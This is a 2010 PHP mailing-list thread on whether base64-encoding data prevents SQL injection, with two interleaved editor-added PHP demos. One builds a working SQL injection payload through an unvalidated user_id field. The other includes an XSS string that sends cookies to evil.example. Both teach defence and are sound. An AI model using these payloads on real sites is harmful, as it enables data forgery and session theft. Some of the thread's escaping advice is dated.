From: Dotan Cohen on
In order to prevent SQL injection, can one simply base64 encode the
data and store that? Then it can be decoded when I need to display it
on a website. I understand that this means that the data will not be
searchable, and that I still must sanitize it before printing it on
the site. Are there any other drawbacks or things to be aware of?
Thanks.

--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.
From: Andrew Ballard on
On Fri, Feb 19, 2010 at 8:18 AM, Dotan Cohen <dotancohen(a)gmail.com> wrote:
> In order to prevent SQL injection, can one simply base64 encode the
> data and store that? Then it can be decoded when I need to display it
> on a website. I understand that this means that the data will not be
> searchable, and that I still must sanitize it before printing it on
> the site. Are there any other drawbacks or things to be aware of?
> Thanks.
>
> --
> Dotan Cohen
>

One would be storage space, as base64 requires more space to store the
same data. For a single data element that might not be much, but when
multiplied over all the values stored in your table it makes a
difference.

Also, don't forget to validate/filter non-character data, which you
can't do with base64. Something like this is still vulnerable to SQL
injection even though it 'sanitizes' the expected character input:

<?php
// user_id expects an integer value, but nothing here checks that it is one
$user_id = $_POST['user_id'];

$comment = base64_encode($_POST['comment']);

// $comment is harmless inside the quotes; $user_id is interpolated raw and unquoted
$sql = "INSERT INTO `comments` (user_id, comment) VALUES ($user_id, '$comment')";

?>



Andrew
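Andrew's point, run end to end as an added example (this is editor-supplied code, not something posted in the thread). It builds the INSERT exactly as above, feeds it a constructed user_id payload, and then does the same insert with a validated integer and a prepared statement. It assumes PHP with the pdo_sqlite extension so it runs offline against an in-memory database; the table, the payload and the helper names (setupDb, insertVulnerable, insertSafe, dumpRows) are assumptions made for the demo and are not from the list.

```php
<?php
declare(strict_types=1);
// Added example, not from the list thread. Uses an in-memory SQLite database
// through PDO so it runs offline; table layout and payload are constructed.

function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE comments (user_id INTEGER NOT NULL, comment TEXT NOT NULL)');
    return $db;
}

// The pattern from the thread: the string column is base64-encoded, the
// integer column is interpolated straight from the request.
function insertVulnerable(PDO $db, string $userId, string $comment): void
{
    $encoded = base64_encode($comment);
    $sql = "INSERT INTO comments (user_id, comment) VALUES ($userId, '$encoded')";
    $db->exec($sql);
}

// Hardened version: validate the integer, then bind both values so request
// data never becomes part of the SQL text.
function insertSafe(PDO $db, string $userId, string $comment): void
{
    $id = filter_var($userId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('user_id must be a positive integer');
    }
    $stmt = $db->prepare('INSERT INTO comments (user_id, comment) VALUES (:uid, :body)');
    $stmt->bindValue(':uid', $id, PDO::PARAM_INT);
    $stmt->bindValue(':body', base64_encode($comment), PDO::PARAM_STR);
    $stmt->execute();
}

function dumpRows(PDO $db): array
{
    return $db->query('SELECT user_id, comment FROM comments ORDER BY rowid')
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed payload: closes the VALUES tuple, appends a second row
// attributed to user 42, and comments out the rest of the statement with
// "--" (valid in both SQLite and MySQL). The attacker even base64-encodes
// the forged text so it decodes cleanly on display.
$attackerUserId  = "7, '" . base64_encode('x') . "'), (42, '"
                 . base64_encode('forged comment from "user 42"') . "') -- ";
$attackerComment = 'harmless looking text';

$db = setupDb();
insertVulnerable($db, $attackerUserId, $attackerComment);
printf("vulnerable: %d row(s) inserted from one request\n", count(dumpRows($db)));
foreach (dumpRows($db) as $row) {
    printf("  user_id=%s comment=%s\n", $row['user_id'], base64_decode($row['comment']));
}

$db = setupDb();
try {
    insertSafe($db, $attackerUserId, $attackerComment);
} catch (InvalidArgumentException $e) {
    echo "safe: rejected -> {$e->getMessage()}\n";
}
insertSafe($db, '7', $attackerComment);
printf("safe: %d row(s) after a legitimate request\n", count(dumpRows($db)));
```

Run it with `php base64_inject.php`. The vulnerable path inserts two rows from a single request, one of them carrying a user_id the attacker chose, even though the comment column was "protected" by base64. The safe path rejects the payload before any SQL is built, and once the values are bound the encoding of the comment no longer matters for injection at all, which is the real answer to the original question: base64 is a storage decision, not a defence.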
From: Dotan Cohen on
On 19 February 2010 16:27, tedd <tedd.sperling(a)gmail.com> wrote:
> At 3:18 PM +0200 2/19/10, Dotan Cohen wrote:
>>
>> In order to prevent SQL injection, can one simply base64 encode the
>> data and store that? Then it can be decoded when I need to display it
>> on a website. I understand that this means that the data will not be
>> searchable, and that I still must sanitize it before printing it on
>> the site. Are there any other drawbacks or things to be aware of?
>> Thanks.
>>
>> --
>> Dotan Cohen
>
>
> Dotan:
>
> You're a smart guy, why reinvent the wheel? The entire problem set has
> already been solved.
>
> Understand there are two issues here: 1) filtering input into a database; 2)
> escaping output to a browser.
>
> Use mysql_real_escape_string() to filter data before it's stored in a
> database (input).
>

I was under the impression that mysql_real_escape_string() was not a
100% solution. Is it? Note that I serve my pages as UTF-8 and also
declare them as such in the header and meta tag, but that does not
mean that a malicious entity won't return a request in a different
encoding.


> Use htmlentities() to retrieve data from the database to be displayed via a
> browser (output).
>

This I do. I'm not sure if it's enough, so I'd like some reassurance
on the matter. :)


> An excellent book on this (and much more) is Chris Shiflett's Essential PHP
> Security. You can pick it up on Amazon for less than $20 -- well worth the
> cost.
>

They don't ship to Israel! I have looked for it locally, but not found
it. I'm sure that I could "acquire" a copy on some p2p service but I
really don't like doing that. Maybe I could Paypal $20 to Chris
himself if that remains my only option! Chris, what say you? (CCed)


--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il
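The output half of tedd's two-issue split, together with the UTF-8 edge case Dotan raises, as an added example (editor-supplied code, not from the thread). It decodes the stored base64 and escapes it for HTML, and shows what happens when the stored bytes are not valid UTF-8. The renderComment() helper and the sample comments are constructed for the demo; it assumes PHP 5.4 or later for ENT_SUBSTITUTE and ENT_HTML5.

```php
<?php
declare(strict_types=1);
// Added example, not from the list thread. Sample comments are constructed.

// Decode what the database returned and escape it for an HTML text node or
// a quoted attribute. ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE
// replaces invalid UTF-8 sequences with U+FFFD instead of returning "".
function renderComment(string $stored): string
{
    $raw = base64_decode($stored, true);   // strict: reject non-base64 bytes
    if ($raw === false) {
        // Not base64: the column was written without going through the
        // application. Show a placeholder rather than the raw bytes.
        return '[unreadable comment]';
    }
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$samples = [
    'plain'     => 'Shalom, world',
    'script'    => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'attribute' => '" onmouseover="alert(1)',
    'bad_utf8'  => "caf\xE9",   // Latin-1 e-acute, not valid UTF-8
];

foreach ($samples as $label => $text) {
    $stored = base64_encode($text);      // what the INSERT path would have stored
    printf("%-10s %s\n", $label, renderComment($stored));
}

// The same bad byte without ENT_SUBSTITUTE: since PHP 5.4 htmlspecialchars()
// returns an empty string for invalid UTF-8, which silently blanks the comment.
printf("%-10s [%s]\n", 'no_subst', htmlspecialchars("caf\xE9", ENT_QUOTES, 'UTF-8'));

// A row that was never base64, to exercise the strict-decode branch.
printf("%-10s %s\n", 'not_b64', renderComment('not base64!'));
```

Two things this shows that the thread only hints at. First, base64 changes nothing on the output side: the decode happens before the escape, so the escaping rules are identical to storing plain text. Second, the encoding mismatch Dotan worries about shows up here as well as on input: pass an explicit 'UTF-8' to htmlspecialchars()/htmlentities() rather than relying on the default, and decide deliberately whether invalid bytes should be replaced (ENT_SUBSTITUTE) or blank the output. On the input side the same rule applies if you stay with mysql_real_escape_string(): it escapes according to the connection's character set, so set that to UTF-8 on the connection itself (mysql_set_charset()) instead of relying on the page headers; with prepared statements the question does not arise.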
From: Dotan Cohen on
> One would be storage space, as base64 requires more space to store the
> same data. For a single data element that might not be much, but when
> multiplied over all the values stored in your table it makes a
> difference.
>

That is a good point, thanks.


> Also, don't forget to validate/filter non-character data, which you
> can't do with base64. Something like this is still vulnerable to SQL
> injection even though it 'sanitizes' the expected character input:
>
> <?php
> // user_id expects an integer value
> $user_id = $_POST['user_id'];
>
> $comment = base64_encode($_POST['comment']);
>
>
> $sql = "INSERT INTO `comments` (user_id, comment) VALUES ($user_id,
> '$comment')";
>
> ?>

I see what you mean. In fact, userIDs are stored, and indeed I ensure
that they are integers!


--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.
From: Dotan Cohen on
> What about eBook ($23.99)?
>
> http://oreilly.com/catalog/9780596006563
>
> If you can get this, you can get that.
>

That may be a good idea. Certainly better than the pirate bay.

--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.